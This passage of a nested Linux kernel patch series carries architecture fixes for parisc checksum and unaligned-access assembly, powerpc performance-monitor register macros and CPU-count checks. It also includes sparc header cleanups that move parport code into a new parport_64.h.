+ 	csr_write64(off, PERCPU_BASE_KS);
+ }
+-#define __my_cpu_offset __my_cpu_offset
++
++#define __my_cpu_offset					\
++({							\
++	__asm__ __volatile__("":"+r"(__my_cpu_offset));	\
++	__my_cpu_offset;				\
++})
+ 
+ #define PERCPU_OP(op, asm_op, c_op)					\
+ static __always_inline unsigned long __percpu_##op(void *ptr,		\
+diff --git a/arch/parisc/include/asm/assembly.h b/arch/parisc/include/asm/assembly.h
+index 5937d5edaba1e..000a28e1c5e8d 100644
+--- a/arch/parisc/include/asm/assembly.h
++++ b/arch/parisc/include/asm/assembly.h
+@@ -97,26 +97,28 @@
+ 	 * version takes two arguments: a src and destination register.
+ 	 * However, the source and destination registers can not be
+ 	 * the same register.
++	 *
++	 * We use add,l to avoid clobbering the C/B bits in the PSW.
+ 	 */
+ 
+ 	.macro  tophys  grvirt, grphys
+-	ldil    L%(__PAGE_OFFSET), \grphys
+-	sub     \grvirt, \grphys, \grphys
++	ldil    L%(-__PAGE_OFFSET), \grphys
++	addl    \grvirt, \grphys, \grphys
+ 	.endm
+-	
++
+ 	.macro  tovirt  grphys, grvirt
+ 	ldil    L%(__PAGE_OFFSET), \grvirt
+-	add     \grphys, \grvirt, \grvirt
++	addl    \grphys, \grvirt, \grvirt
+ 	.endm
+ 
+ 	.macro  tophys_r1  gr
+-	ldil    L%(__PAGE_OFFSET), %r1
+-	sub     \gr, %r1, \gr
++	ldil    L%(-__PAGE_OFFSET), %r1
++	addl    \gr, %r1, \gr
+ 	.endm
+-	
++
+ 	.macro  tovirt_r1  gr
+ 	ldil    L%(__PAGE_OFFSET), %r1
+-	add     \gr, %r1, \gr
++	addl    \gr, %r1, \gr
+ 	.endm
+ 
+ 	.macro delay value
+diff --git a/arch/parisc/include/asm/checksum.h b/arch/parisc/include/asm/checksum.h
+index 3c43baca7b397..2aceebcd695c8 100644
+--- a/arch/parisc/include/asm/checksum.h
++++ b/arch/parisc/include/asm/checksum.h
+@@ -40,7 +40,7 @@ static inline __sum16 ip_fast_csum(const void *iph, unsigned int ihl)
+ "	addc		%0, %5, %0\n"
+ "	addc		%0, %3, %0\n"
+ "1:	ldws,ma		4(%1), %3\n"
+-"	addib,<		0, %2, 1b\n"
++"	addib,>		-1, %2, 1b\n"
+ "	addc		%0, %3, %0\n"
+ "\n"
+ "	extru		%0, 31, 16, %4\n"
+@@ -126,6 +126,7 @@ static __inline__ __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ 	** Try to keep 4 registers with "live" values ahead of the ALU.
+ 	*/
+ 
++"	depdi		0, 31, 32, %0\n"/* clear upper half of incoming checksum */
+ "	ldd,ma		8(%1), %4\n"	/* get 1st saddr word */
+ "	ldd,ma		8(%2), %5\n"	/* get 1st daddr word */
+ "	add		%4, %0, %0\n"
+@@ -137,8 +138,8 @@ static __inline__ __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ "	add,dc		%3, %0, %0\n"  /* fold in proto+len | carry bit */
+ "	extrd,u		%0, 31, 32, %4\n"/* copy upper half down */
+ "	depdi		0, 31, 32, %0\n"/* clear upper half */
+-"	add		%4, %0, %0\n"	/* fold into 32-bits */
+-"	addc		0, %0, %0\n"	/* add carry */
++"	add,dc		%4, %0, %0\n"	/* fold into 32-bits, plus carry */
++"	addc		0, %0, %0\n"	/* add final carry */
+ 
+ #else
+ 
+@@ -163,7 +164,8 @@ static __inline__ __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ "	ldw,ma		4(%2), %7\n"	/* 4th daddr */
+ "	addc		%6, %0, %0\n"
+ "	addc		%7, %0, %0\n"
+-"	addc		%3, %0, %0\n"	/* fold in proto+len, catch carry */
++"	addc		%3, %0, %0\n"	/* fold in proto+len */
++"	addc		0, %0, %0\n"	/* add carry */
+ 
+ #endif
+ 	: "=r" (sum), "=r" (saddr), "=r" (daddr), "=r" (len),
+diff --git a/arch/parisc/kernel/unaligned.c b/arch/parisc/kernel/unaligned.c
+index 8a8e7d7224a26..782ee05e20889 100644
+--- a/arch/parisc/kernel/unaligned.c
++++ b/arch/parisc/kernel/unaligned.c
+@@ -167,6 +167,7 @@ static int emulate_ldw(struct pt_regs *regs, int toreg, int flop)
+ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ {
+ 	unsigned long saddr = regs->ior;
++	unsigned long shift, temp1;
+ 	__u64 val = 0;
+ 	ASM_EXCEPTIONTABLE_VAR(ret);
+ 
+@@ -178,25 +179,22 @@ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ 
+ #ifdef CONFIG_64BIT
+ 	__asm__ __volatile__  (
+-"	depd,z	%3,60,3,%%r19\n"		/* r19=(ofs&7)*8 */
+-"	mtsp	%4, %%sr1\n"
+-"	depd	%%r0,63,3,%3\n"
+-"1:	ldd	0(%%sr1,%3),%0\n"
+-"2:	ldd	8(%%sr1,%3),%%r20\n"
+-"	subi	64,%%r19,%%r19\n"
+-"	mtsar	%%r19\n"
+-"	shrpd	%0,%%r20,%%sar,%0\n"
++"	depd,z	%2,60,3,%3\n"		/* shift=(ofs&7)*8 */
++"	mtsp	%5, %%sr1\n"
++"	depd	%%r0,63,3,%2\n"
++"1:	ldd	0(%%sr1,%2),%0\n"
++"2:	ldd	8(%%sr1,%2),%4\n"
++"	subi	64,%3,%3\n"
++"	mtsar	%3\n"
++"	shrpd	%0,%4,%%sar,%0\n"
+ "3:	\n"
+ 	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%1")
+ 	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%1")
+-	: "=r" (val), "+r" (ret)
+-	: "0" (val), "r" (saddr), "r" (regs->isr)
+-	: "r19", "r20" );
++	: "+r" (val), "+r" (ret), "+r" (saddr), "=&r" (shift), "=&r" (temp1)
++	: "r" (regs->isr) );
+ #else
+-    {
+-	unsigned long shift, temp1;
+ 	__asm__ __volatile__  (
+-"	zdep	%2,29,2,%3\n"		/* r19=(ofs&3)*8 */
++"	zdep	%2,29,2,%3\n"		/* shift=(ofs&3)*8 */
+ "	mtsp	%5, %%sr1\n"
+ "	dep	%%r0,31,2,%2\n"
+ "1:	ldw	0(%%sr1,%2),%0\n"
+@@ -212,7 +210,6 @@ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ 	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 4b, "%1")
+ 	: "+r" (val), "+r" (ret), "+r" (saddr), "=&r" (shift), "=&r" (temp1)
+ 	: "r" (regs->isr) );
+-    }
+ #endif
+ 
+ 	DPRINTF("val = 0x%llx\n", val);
+diff --git a/arch/powerpc/include/asm/reg_fsl_emb.h b/arch/powerpc/include/asm/reg_fsl_emb.h
+index a21f529c43d96..8359c06d92d9f 100644
+--- a/arch/powerpc/include/asm/reg_fsl_emb.h
++++ b/arch/powerpc/include/asm/reg_fsl_emb.h
+@@ -12,9 +12,16 @@
+ #ifndef __ASSEMBLY__
+ /* Performance Monitor Registers */
+ #define mfpmr(rn)	({unsigned int rval; \
+-			asm volatile("mfpmr %0," __stringify(rn) \
++			asm volatile(".machine push; " \
++				     ".machine e300; " \
++				     "mfpmr %0," __stringify(rn) ";" \
++				     ".machine pop; " \
+ 				     : "=r" (rval)); rval;})
+-#define mtpmr(rn, v)	asm volatile("mtpmr " __stringify(rn) ",%0" : : "r" (v))
++#define mtpmr(rn, v)	asm volatile(".machine push; " \
++				     ".machine e300; " \
++				     "mtpmr " __stringify(rn) ",%0; " \
++				     ".machine pop; " \
++				     : : "r" (v))
+ #endif /* __ASSEMBLY__ */
+ 
+ /* Freescale Book E Performance Monitor APU Registers */
+diff --git a/arch/powerpc/kernel/prom.c b/arch/powerpc/kernel/prom.c
+index 8537c354c560b..9531ab90feb8a 100644
+--- a/arch/powerpc/kernel/prom.c
++++ b/arch/powerpc/kernel/prom.c
+@@ -369,6 +369,18 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 	if (IS_ENABLED(CONFIG_PPC64))
+ 		boot_cpu_hwid = be32_to_cpu(intserv[found_thread]);
+ 
++	if (nr_cpu_ids % nthreads != 0) {
++		set_nr_cpu_ids(ALIGN(nr_cpu_ids, nthreads));
++		pr_warn("nr_cpu_ids was not a multiple of threads_per_core, adjusted to %d\n",
++			nr_cpu_ids);
++	}
++
++	if (boot_cpuid >= nr_cpu_ids) {
++		set_nr_cpu_ids(min(CONFIG_NR_CPUS, ALIGN(boot_cpuid + 1, nthreads)));
++		pr_warn("Boot CPU %d >= nr_cpu_ids, adjusted nr_cpu_ids to %d\n",
++			boot_cpuid, nr_cpu_ids);
++	}
++
+ 	/*
+ 	 * PAPR defines "logical" PVR values for cpus that
+ 	 * meet various levels of the architecture:
+diff --git a/arch/powerpc/lib/Makefile b/arch/powerpc/lib/Makefile
+index 9b394bab17eba..374b82cf13d9d 100644
+--- a/arch/powerpc/lib/Makefile
++++ b/arch/powerpc/lib/Makefile
+@@ -72,7 +72,7 @@ obj-$(CONFIG_PPC_LIB_RHEAP) += rheap.o
+ obj-$(CONFIG_FTR_FIXUP_SELFTEST) += feature-fixups-test.o
+ 
+ obj-$(CONFIG_ALTIVEC)	+= xor_vmx.o xor_vmx_glue.o
+-CFLAGS_xor_vmx.o += -maltivec $(call cc-option,-mabi=altivec)
++CFLAGS_xor_vmx.o += -mhard-float -maltivec $(call cc-option,-mabi=altivec)
+ # Enable <altivec.h>
+ CFLAGS_xor_vmx.o += -isystem $(shell $(CC) -print-file-name=include)
+ 
+diff --git a/arch/sparc/crypto/crop_devid.c b/arch/sparc/crypto/crop_devid.c
+index 83fc4536dcd57..93f4e0fdd38c1 100644
+--- a/arch/sparc/crypto/crop_devid.c
++++ b/arch/sparc/crypto/crop_devid.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+-#include <linux/of_device.h>
+ 
+ /* This is a dummy device table linked into all of the crypto
+  * opcode drivers.  It serves to trigger the module autoloading
+diff --git a/arch/sparc/include/asm/floppy_32.h b/arch/sparc/include/asm/floppy_32.h
+index e10ab9ad3097d..836f6575aa1d7 100644
+--- a/arch/sparc/include/asm/floppy_32.h
++++ b/arch/sparc/include/asm/floppy_32.h
+@@ -8,7 +8,7 @@
+ #define __ASM_SPARC_FLOPPY_H
+ 
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
+ #include <linux/pgtable.h>
+ 
+ #include <asm/idprom.h>
+diff --git a/arch/sparc/include/asm/floppy_64.h b/arch/sparc/include/asm/floppy_64.h
+index 070c8c1f5c8fd..6efeb24b0a92c 100644
+--- a/arch/sparc/include/asm/floppy_64.h
++++ b/arch/sparc/include/asm/floppy_64.h
+@@ -11,7 +11,7 @@
+ #define __ASM_SPARC64_FLOPPY_H
+ 
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
+ #include <linux/dma-mapping.h>
+ 
+ #include <asm/auxio.h>
+diff --git a/arch/sparc/include/asm/parport.h b/arch/sparc/include/asm/parport.h
+index 03b27090c0c8c..e2eed8f97665f 100644
+--- a/arch/sparc/include/asm/parport.h
++++ b/arch/sparc/include/asm/parport.h
+@@ -1,255 +1,11 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-/* parport.h: sparc64 specific parport initialization and dma.
+- *
+- * Copyright (C) 1999  Eddie C. Dost  (ecd@skynet.be)
+- */
++#ifndef ___ASM_SPARC_PARPORT_H
++#define ___ASM_SPARC_PARPORT_H
+ 
+-#ifndef _ASM_SPARC64_PARPORT_H
+-#define _ASM_SPARC64_PARPORT_H 1
+-
+-#include <linux/of_device.h>
+-
+-#include <asm/ebus_dma.h>
+-#include <asm/ns87303.h>
+-#include <asm/prom.h>
+-
+-#define PARPORT_PC_MAX_PORTS	PARPORT_MAX
+-
+-/*
+- * While sparc64 doesn't have an ISA DMA API, we provide something that looks
+- * close enough to make parport_pc happy
+- */
+-#define HAS_DMA
+-
+-#ifdef CONFIG_PARPORT_PC_FIFO
+-static DEFINE_SPINLOCK(dma_spin_lock);
+-
+-#define claim_dma_lock() \
+-({	unsigned long flags; \
+-	spin_lock_irqsave(&dma_spin_lock, flags); \
+-	flags; \
+-})
+-
+-#define release_dma_lock(__flags) \
+-	spin_unlock_irqrestore(&dma_spin_lock, __flags);
++#if defined(__sparc__) && defined(__arch64__)
++#include <asm/parport_64.h>
++#else
++#include <asm-generic/parport.h>
++#endif
+ #endif
+ 
+-static struct sparc_ebus_info {
+-	struct ebus_dma_info info;
+-	unsigned int addr;
+-	unsigned int count;
+-	int lock;
+-
+-	struct parport *port;
+-} sparc_ebus_dmas[PARPORT_PC_MAX_PORTS];
+-
+-static DECLARE_BITMAP(dma_slot_map, PARPORT_PC_MAX_PORTS);
+-
+-static inline int request_dma(unsigned int dmanr, const char *device_id)
+-{
+-	if (dmanr >= PARPORT_PC_MAX_PORTS)
+-		return -EINVAL;
+-	if (xchg(&sparc_ebus_dmas[dmanr].lock, 1) != 0)
+-		return -EBUSY;
+-	return 0;
+-}
+-
+-static inline void free_dma(unsigned int dmanr)
+-{
+-	if (dmanr >= PARPORT_PC_MAX_PORTS) {
+-		printk(KERN_WARNING "Trying to free DMA%d\n", dmanr);
+-		return;
+-	}
+-	if (xchg(&sparc_ebus_dmas[dmanr].lock, 0) == 0) {
+-		printk(KERN_WARNING "Trying to free free DMA%d\n", dmanr);
+-		return;
+-	}
+-}
+-
+-static inline void enable_dma(unsigned int dmanr)
+-{
+-	ebus_dma_enable(&sparc_ebus_dmas[dmanr].info, 1);
+-
+-	if (ebus_dma_request(&sparc_ebus_dmas[dmanr].info,
+-			     sparc_ebus_dmas[dmanr].addr,
+-			     sparc_ebus_dmas[dmanr].count))
+-		BUG();
+-}
+-
+-static inline void disable_dma(unsigned int dmanr)
+-{
+-	ebus_dma_enable(&sparc_ebus_dmas[dmanr].info, 0);
+-}
+-
+-static inline void clear_dma_ff(unsigned int dmanr)
+-{
+-	/* nothing */
+-}
+-
+-static inline void set_dma_mode(unsigned int dmanr, char mode)
+-{
+-	ebus_dma_prepare(&sparc_ebus_dmas[dmanr].info, (mode != DMA_MODE_WRITE));
+-}
+-
+-static inline void set_dma_addr(unsigned int dmanr, unsigned int addr)
+-{
+-	sparc_ebus_dmas[dmanr].addr = addr;
+-}
+-
+-static inline void set_dma_count(unsigned int dmanr, unsigned int count)
+-{
+-	sparc_ebus_dmas[dmanr].count = count;
+-}
+-
+-static inline unsigned int get_dma_residue(unsigned int dmanr)
+-{
+-	return ebus_dma_residue(&sparc_ebus_dmas[dmanr].info);
+-}
+-
+-static int ecpp_probe(struct platform_device *op)
+-{
+-	unsigned long base = op->resource[0].start;
+-	unsigned long config = op->resource[1].start;
+-	unsigned long d_base = op->resource[2].start;
+-	unsigned long d_len;
+-	struct device_node *parent;
+-	struct parport *p;
+-	int slot, err;
+-
+-	parent = op->dev.of_node->parent;
+-	if (of_node_name_eq(parent, "dma")) {
+-		p = parport_pc_probe_port(base, base + 0x400,
+-					  op->archdata.irqs[0], PARPORT_DMA_NOFIFO,
+-					  op->dev.parent->parent, 0);
+-		if (!p)
+-			return -ENOMEM;
+-		dev_set_drvdata(&op->dev, p);
+-		return 0;
+-	}
+-
+-	for (slot = 0; slot < PARPORT_PC_MAX_PORTS; slot++) {
+-		if (!test_and_set_bit(slot, dma_slot_map))
+-			break;
+-	}
+-	err = -ENODEV;
+-	if (slot >= PARPORT_PC_MAX_PORTS)
+-		goto out_err;
+-
+-	spin_lock_init(&sparc_ebus_dmas[slot].info.lock);
+-
+-	d_len = (op->resource[2].end - d_base) + 1UL;
+-	sparc_ebus_dmas[slot].info.regs =
+-		of_ioremap(&op->resource[2], 0, d_len, "ECPP DMA");
+-
+-	if (!sparc_ebus_dmas[slot].info.regs)
+-		goto out_clear_map;
+-
+-	sparc_ebus_dmas[slot].info.flags = 0;
+-	sparc_ebus_dmas[slot].info.callback = NULL;
+-	sparc_ebus_dmas[slot].info.client_cookie = NULL;
+-	sparc_ebus_dmas[slot].info.irq = 0xdeadbeef;
+-	strcpy(sparc_ebus_dmas[slot].info.name, "parport");
+-	if (ebus_dma_register(&sparc_ebus_dmas[slot].info))
+-		goto out_unmap_regs;
+-
+-	ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 1);
+-
+-	/* Configure IRQ to Push Pull, Level Low */
+-	/* Enable ECP, set bit 2 of the CTR first */
+-	outb(0x04, base + 0x02);
+-	ns87303_modify(config, PCR,
+-		       PCR_EPP_ENABLE |
+-		       PCR_IRQ_ODRAIN,
+-		       PCR_ECP_ENABLE |
+-		       PCR_ECP_CLK_ENA |
+-		       PCR_IRQ_POLAR);
+-
+-	/* CTR bit 5 controls direction of port */
+-	ns87303_modify(config, PTR,
+-		       0, PTR_LPT_REG_DIR);
+-
+-	p = parport_pc_probe_port(base, base + 0x400,
+-				  op->archdata.irqs[0],
+-				  slot,
+-				  op->dev.parent,
+-				  0);
+-	err = -ENOMEM;
+-	if (!p)
+-		goto out_disable_irq;
+-
+-	dev_set_drvdata(&op->dev, p);
+-
+-	return 0;
+-
+-out_disable_irq:
+-	ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 0);
+-	ebus_dma_unregister(&sparc_ebus_dmas[slot].info);
+-
+-out_unmap_regs:
+-	of_iounmap(&op->resource[2], sparc_ebus_dmas[slot].info.regs, d_len);
+-
+-out_clear_map:
+-	clear_bit(slot, dma_slot_map);
+-
+-out_err:
+-	return err;
+-}
+-
+-static int ecpp_remove(struct platform_device *op)
+-{
+-	struct parport *p = dev_get_drvdata(&op->dev);
+-	int slot = p->dma;
+-
+-	parport_pc_unregister_port(p);
+-
+-	if (slot != PARPORT_DMA_NOFIFO) {
+-		unsigned long d_base = op->resource[2].start;
+-		unsigned long d_len;
+-
+-		d_len = (op->resource[2].end - d_base) + 1UL;
+-
+-		ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 0);
+-		ebus_dma_unregister(&sparc_ebus_dmas[slot].info);
+-		of_iounmap(&op->resource[2],
+-			   sparc_ebus_dmas[slot].info.regs,
+-			   d_len);
+-		clear_bit(slot, dma_slot_map);
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct of_device_id ecpp_match[] = {
+-	{
+-		.name = "ecpp",
+-	},
+-	{
+-		.name = "parallel",
+-		.compatible = "ecpp",
+-	},
+-	{
+-		.name = "parallel",
+-		.compatible = "ns87317-ecpp",
+-	},
+-	{
+-		.name = "parallel",
+-		.compatible = "pnpALI,1533,3",
+-	},
+-	{},
+-};
+-
+-static struct platform_driver ecpp_driver = {
+-	.driver = {
+-		.name = "ecpp",
+-		.of_match_table = ecpp_match,
+-	},
+-	.probe			= ecpp_probe,
+-	.remove			= ecpp_remove,
+-};
+-
+-static int parport_pc_find_nonpci_ports(int autoirq, int autodma)
+-{
+-	return platform_driver_register(&ecpp_driver);
+-}
+-
+-#endif /* !(_ASM_SPARC64_PARPORT_H */
+diff --git a/arch/sparc/include/asm/parport_64.h b/arch/sparc/include/asm/parport_64.h
+new file mode 100644
+index 0000000000000..0a7ffcfd59cda
+--- /dev/null
++++ b/arch/sparc/include/asm/parport_64.h
+@@ -0,0 +1,256 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/* parport.h: sparc64 specific parport initialization and dma.
++ *
++ * Copyright (C) 1999  Eddie C. Dost  (ecd@skynet.be)
++ */
++
++#ifndef _ASM_SPARC64_PARPORT_H
++#define _ASM_SPARC64_PARPORT_H 1
++
++#include <linux/of.h>
++#include <linux/platform_device.h>
++
++#include <asm/ebus_dma.h>
++#include <asm/ns87303.h>
++#include <asm/prom.h>
++
++#define PARPORT_PC_MAX_PORTS	PARPORT_MAX
++
++/*
++ * While sparc64 doesn't have an ISA DMA API, we provide something that looks
++ * close enough to make parport_pc happy
++ */
++#define HAS_DMA
++
++#ifdef CONFIG_PARPORT_PC_FIFO
++static DEFINE_SPINLOCK(dma_spin_lock);
++
++#define claim_dma_lock() \
++({	unsigned long flags; \
++	spin_lock_irqsave(&dma_spin_lock, flags); \
++	flags; \
++})
++
++#define release_dma_lock(__flags) \
++	spin_unlock_irqrestore(&dma_spin_lock, __flags);
++#endif
++
++static struct sparc_ebus_info {
++	struct ebus_dma_info info;
++	unsigned int addr;
++	unsigned int count;
++	int lock;
++
++	struct parport *port;
++} sparc_ebus_dmas[PARPORT_PC_MAX_PORTS];
++
++static DECLARE_BITMAP(dma_slot_map, PARPORT_PC_MAX_PORTS);
++
++static inline int request_dma(unsigned int dmanr, const char *device_id)
++{
++	if (dmanr >= PARPORT_PC_MAX_PORTS)
++		return -EINVAL;
++	if (xchg(&sparc_ebus_dmas[dmanr].lock, 1) != 0)
++		return -EBUSY;
++	return 0;
++}
++
++static inline void free_dma(unsigned int dmanr)
++{
++	if (dmanr >= PARPORT_PC_MAX_PORTS) {
++		printk(KERN_WARNING "Trying to free DMA%d\n", dmanr);
++		return;
++	}
++	if (xchg(&sparc_ebus_dmas[dmanr].lock, 0) == 0) {
++		printk(KERN_WARNING "Trying to free free DMA%d\n", dmanr);
++		return;
++	}
++}
++
++static inline void enable_dma(unsigned int dmanr)
++{
++	ebus_dma_enable(&sparc_ebus_dmas[dmanr].info, 1);
++
++	if (ebus_dma_request(&sparc_ebus_dmas[dmanr].info,
++			     sparc_ebus_dmas[dmanr].addr,
++			     sparc_ebus_dmas[dmanr].count))
++		BUG();
++}
++
++static inline void disable_dma(unsigned int dmanr)
++{
++	ebus_dma_enable(&sparc_ebus_dmas[dmanr].info, 0);
++}
++
++static inline void clear_dma_ff(unsigned int dmanr)
++{
++	/* nothing */
++}
++
++static inline void set_dma_mode(unsigned int dmanr, char mode)
++{
++	ebus_dma_prepare(&sparc_ebus_dmas[dmanr].info, (mode != DMA_MODE_WRITE));
++}
++
++static inline void set_dma_addr(unsigned int dmanr, unsigned int addr)
++{
++	sparc_ebus_dmas[dmanr].addr = addr;
++}
++
++static inline void set_dma_count(unsigned int dmanr, unsigned int count)
++{
++	sparc_ebus_dmas[dmanr].count = count;
++}
++
++static inline unsigned int get_dma_residue(unsigned int dmanr)
++{
++	return ebus_dma_residue(&sparc_ebus_dmas[dmanr].info);
++}
++
++static int ecpp_probe(struct platform_device *op)
++{
++	unsigned long base = op->resource[0].start;
++	unsigned long config = op->resource[1].start;
++	unsigned long d_base = op->resource[2].start;
++	unsigned long d_len;
++	struct device_node *parent;
++	struct parport *p;
++	int slot, err;
++
++	parent = op->dev.of_node->parent;
++	if (of_node_name_eq(parent, "dma")) {
++		p = parport_pc_probe_port(base, base + 0x400,
++					  op->archdata.irqs[0], PARPORT_DMA_NOFIFO,
++					  op->dev.parent->parent, 0);
++		if (!p)
++			return -ENOMEM;
++		dev_set_drvdata(&op->dev, p);
++		return 0;
++	}
++
++	for (slot = 0; slot < PARPORT_PC_MAX_PORTS; slot++) {
++		if (!test_and_set_bit(slot, dma_slot_map))
++			break;
++	}
++	err = -ENODEV;
++	if (slot >= PARPORT_PC_MAX_PORTS)
++		goto out_err;
++
++	spin_lock_init(&sparc_ebus_dmas[slot].info.lock);
++
++	d_len = (op->resource[2].end - d_base) + 1UL;
++	sparc_ebus_dmas[slot].info.regs =
++		of_ioremap(&op->resource[2], 0, d_len, "ECPP DMA");
++
++	if (!sparc_ebus_dmas[slot].info.regs)
++		goto out_clear_map;
++
++	sparc_ebus_dmas[slot].info.flags = 0;
++	sparc_ebus_dmas[slot].info.callback = NULL;
++	sparc_ebus_dmas[slot].info.client_cookie = NULL;
++	sparc_ebus_dmas[slot].info.irq = 0xdeadbeef;
++	strcpy(sparc_ebus_dmas[slot].info.name, "parport");
++	if (ebus_dma_register(&sparc_ebus_dmas[slot].info))
++		goto out_unmap_regs;
++
++	ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 1);
++
++	/* Configure IRQ to Push Pull, Level Low */
++	/* Enable ECP, set bit 2 of the CTR first */
++	outb(0x04, base + 0x02);
++	ns87303_modify(config, PCR,
++		       PCR_EPP_ENABLE |
++		       PCR_IRQ_ODRAIN,
++		       PCR_ECP_ENABLE |
++		       PCR_ECP_CLK_ENA |
++		       PCR_IRQ_POLAR);
++
++	/* CTR bit 5 controls direction of port */
++	ns87303_modify(config, PTR,
++		       0, PTR_LPT_REG_DIR);
++
++	p = parport_pc_probe_port(base, base + 0x400,
++				  op->archdata.irqs[0],
++				  slot,
++				  op->dev.parent,
++				  0);
++	err = -ENOMEM;
++	if (!p)
++		goto out_disable_irq;
++
++	dev_set_drvdata(&op->dev, p);
++
++	return 0;
++
++out_disable_irq:
++	ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 0);
++	ebus_dma_unregister(&sparc_ebus_dmas[slot].info);
++
++out_unmap_regs:
++	of_iounmap(&op->resource[2], sparc_ebus_dmas[slot].info.regs, d_len);
++
++out_clear_map:
++	clear_bit(slot, dma_slot_map);
++
++out_err:
++	return err;
++}
++
++static int ecpp_remove(struct platform_device *op)
++{
++	struct parport *p = dev_get_drvdata(&op->dev);
++	int slot = p->dma;
++
++	parport_pc_unregister_port(p);
++
++	if (slot != PARPORT_DMA_NOFIFO) {
++		unsigned long d_base = op->resource[2].start;
++		unsigned long d_len;
++
++		d_len = (op->resource[2].end - d_base) + 1UL;
++
++		ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 0);
++		ebus_dma_unregister(&sparc_ebus_dmas[slot].info);
++		of_iounmap(&op->resource[2],
++			   sparc_ebus_dmas[slot].info.regs,
++			   d_len);
++		clear_bit(slot, dma_slot_map);
++	}
++
++	return 0;
++}
++
++static const struct of_device_id ecpp_match[] = {
++	{
++		.name = "ecpp",
++	},
++	{
++		.name = "parallel",
++		.compatible = "ecpp",
++	},
++	{
++		.name = "parallel",
++		.compatible = "ns87317-ecpp",
++	},
++	{
++		.name = "parallel",
++		.compatible = "pnpALI,1533,3",
++	},
++	{},
++};
++
++static struct platform_driver ecpp_driver = {
++	.driver = {
++		.name = "ecpp",
++		.of_match_table = ecpp_match,
++	},
++	.probe			= ecpp_probe,
++	.remove			= ecpp_remove,
++};
++
++static int parport_pc_find_nonpci_ports(int autoirq, int autodma)
++{
++	return platform_driver_register(&ecpp_driver);
++}
++
++#endif /* !(_ASM_SPARC64_PARPORT_H */
+diff --git a/arch/sparc/kernel/apc.c b/arch/sparc/kernel/apc.c
+index ecd05bc0a1045..d44725d37e30f 100644
+--- a/arch/sparc/kernel/apc.c
++++ b/arch/sparc/kernel/apc.c
+@@ -13,7 +13,7 @@
+ #include <linux/miscdevice.h>
+ #include <linux/pm.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/platform_device.h>
+ #include <linux/module.h>
+ 
+ #include <asm/io.h>
+diff --git a/arch/sparc/kernel/auxio_32.c b/arch/sparc/kernel/auxio_32.c
+index a32d588174f2f..989860e890c4f 100644
+--- a/arch/sparc/kernel/auxio_32.c
++++ b/arch/sparc/kernel/auxio_32.c
+@@ -8,7 +8,6 @@
+ #include <linux/init.h>
+ #include <linux/spinlock.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
+ #include <linux/export.h>
+ 
+ #include <asm/oplib.h>
+diff --git a/arch/sparc/kernel/auxio_64.c b/arch/sparc/kernel/auxio_64.c
+index 774a82b0c649f..2a2800d213256 100644
+--- a/arch/sparc/kernel/auxio_64.c
++++ b/arch/sparc/kernel/auxio_64.c
+@@ -10,7 +10,8 @@
+ #include <linux/kernel.h>
+ #include <linux/init.h>
+ #include <linux/ioport.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/prom.h>
+ #include <asm/io.h>
+diff --git a/arch/sparc/kernel/central.c b/arch/sparc/kernel/central.c
+index 23f8838dd96e3..a1a6485c91831 100644
+--- a/arch/sparc/kernel/central.c
++++ b/arch/sparc/kernel/central.c
+@@ -10,7 +10,7 @@
+ #include <linux/export.h>
+ #include <linux/string.h>
+ #include <linux/init.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
+ #include <linux/platform_device.h>
+ 
+ #include <asm/fhc.h>
+diff --git a/arch/sparc/kernel/chmc.c b/arch/sparc/kernel/chmc.c
+index 6ff43df740e08..d5fad5fb04c1d 100644
+--- a/arch/sparc/kernel/chmc.c
++++ b/arch/sparc/kernel/chmc.c
+@@ -15,7 +15,8 @@
+ #include <linux/errno.h>
+ #include <linux/init.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <asm/spitfire.h>
+ #include <asm/chmctrl.h>
+ #include <asm/cpudata.h>
+diff --git a/arch/sparc/kernel/ioport.c b/arch/sparc/kernel/ioport.c
+index 4e4f3d3263e46..e5a327799e574 100644
+--- a/arch/sparc/kernel/ioport.c
++++ b/arch/sparc/kernel/ioport.c
+@@ -39,7 +39,7 @@
+ #include <linux/seq_file.h>
+ #include <linux/scatterlist.h>
+ #include <linux/dma-map-ops.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
+ 
+ #include <asm/io.h>
+ #include <asm/vaddrs.h>
+diff --git a/arch/sparc/kernel/leon_kernel.c b/arch/sparc/kernel/leon_kernel.c
+index 39229940d725d..4c61da491fee1 100644
+--- a/arch/sparc/kernel/leon_kernel.c
++++ b/arch/sparc/kernel/leon_kernel.c
+@@ -8,9 +8,7 @@
+ #include <linux/errno.h>
+ #include <linux/mutex.h>
+ #include <linux/of.h>
+-#include <linux/of_platform.h>
+ #include <linux/interrupt.h>
+-#include <linux/of_device.h>
+ #include <linux/clocksource.h>
+ #include <linux/clockchips.h>
+ 
+diff --git a/arch/sparc/kernel/leon_pci.c b/arch/sparc/kernel/leon_pci.c
